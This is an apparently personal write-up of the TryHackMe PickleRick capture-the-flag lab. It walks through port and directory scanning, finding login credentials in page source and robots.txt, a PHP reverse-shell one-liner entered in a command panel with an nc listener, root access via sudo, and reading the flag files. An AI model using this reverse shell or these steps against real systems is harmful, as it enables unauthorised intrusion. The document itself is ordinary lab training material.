TryHackMe PickleRick **Walkthrough**

#alperenugurlu

First of all, I connect to my ‘vpn’ server from my own machine via tryhackme.

root@kali:~# openvpn alperenugurlu…

My web pentesting strategy, usually my first step is to behave like a normal user and then turn into a professional. I can say that this strategy makes things easier. So my first step here was to visit the web address. And it was a little tampering.

When I looked at the website, I did not get much information worth mentioning. Now let’s take a look at the code that provides the content of the website, using the new step ‘curl’ tool. But here I see filtering as ‘username’, ‘login’, ‘password’ when using ‘curl’ in order not to get bogged down in the code repository.

I performed this process. And ‘username’: ‘R1ckRul3s’ information appeared.

root@kali:~# curl ‘10.10.101.139’ | grep -i ‘username’

It’s time for more professional transactions. I’ve used ‘dirb, gobuster, nmap, nikto’ tools here. Because with ‘nmap’ I wanted to see open ports and services running on those ports. I wanted to discover hidden directories and folders with the ‘dirb, gobuster, nikto’ tool.

root@kali:~# nmap -sS -sV -A -p- 10.10.101.139

root@kali:~# dirb http://10.10.101.139

root@kali:~# gobuster dir — url http://10.10.101.139 -w /usr/share/dirb/wordlist/big.txt

root@kali:~# nikto -h http://10.10.101.139

The results that catch my attention in this section are ‘robots.txt, login.php’ pages. I go to these folders immediately.(We have seen that the ‘ssh’ service is running in the Nmap scan, then this ‘ssh’ link will be useful.)

When we entered the ‘robots.txt’ page, we saw the phrase ‘Wubbalubbadubdub’, which we think may be a password. After that, we visit our ‘login.php’ page. And we see a login page. With the ‘username’ we discovered earlier, we try to login with the phrase we think may be the password on the ‘robots.txt’ page.

Login was successful. We immediately came across a panel where we can create input. Here I ran the ‘ls’ command for testing purposes. It showed files as output. For me this is a weakness. Here it means we can execute code.

Now here I will try to run code with software languages for remote connection. My opinion is that the ‘php’ language is used within the site, so the idea of using ‘php’ is closer to me. Now, with a little research on the internet, I found the codes for the reverse shell link.

Sample site: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

Now, I complete the code by typing the code written in ‘php’ language on the panel on the website, the port I want to connect to with the reverse shell and my own ip address. First I start listening with the ‘nc’ tool on my own screen. Then I run the code on the panel.

root@kali:~# nc -lvnp 4242

Panel İnput:

php -r ‘$sock=fsockopen(“10.9.3.72”,4242);$proc=proc_open(“/bin/sh -i”, array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);’

And we made our remote connection. Here I wanted to see which user group we belong to with the ‘id’ command.Here I tried to run the privilege escalation code with ‘python’ to be ‘root’, but the system did not allow it. We raised our privileges to ‘root’ by running the ‘sudo su’ argument.

Now is the time to collect the flags. When we ran the ‘ls’ command here, we saw the files and folders. A file with the extension ‘Sup3rS3 ,,,,,. Txt’ draws my attention. I read the inside of the file with ‘cat Sup3rS3 ,,,,,. txt’ parameter. Here we get our first flag.
I have examined other files here. And I couldn’t find anything. I go to the upper folder with the ‘cd ..’ command. I am viewing files with the ‘ls’ command. And we see the file ‘3rd.txt’. We read the contents of the file with the ‘cat 3rd.txt’ command. Here we have our third flag. Now I run the ‘cd ..’ command to go to the next higher folder. I browse through the files. And I see that there are folders in the ‘home’ folder that caught our attention. We enter the rick folder with the ‘cd home’ then ‘cd rick’ command. Here we see a file named ‘second …’. But the extension ‘.txt’ etc. is not a file. To be able to read the content of this, we can read it with an expression like cat ‘second …’ . The reason for this is that the system accepts it as a ‘string’ since the extension is not known. And here after reading the content, we have captured our second flag.

Your Hacking Happily and Healthily.

Contact: https://www.linkedin.com/in/alperen-u-7b57b7178/

Ethical Hacker | Offensive Hacker | Penetration Test Specialist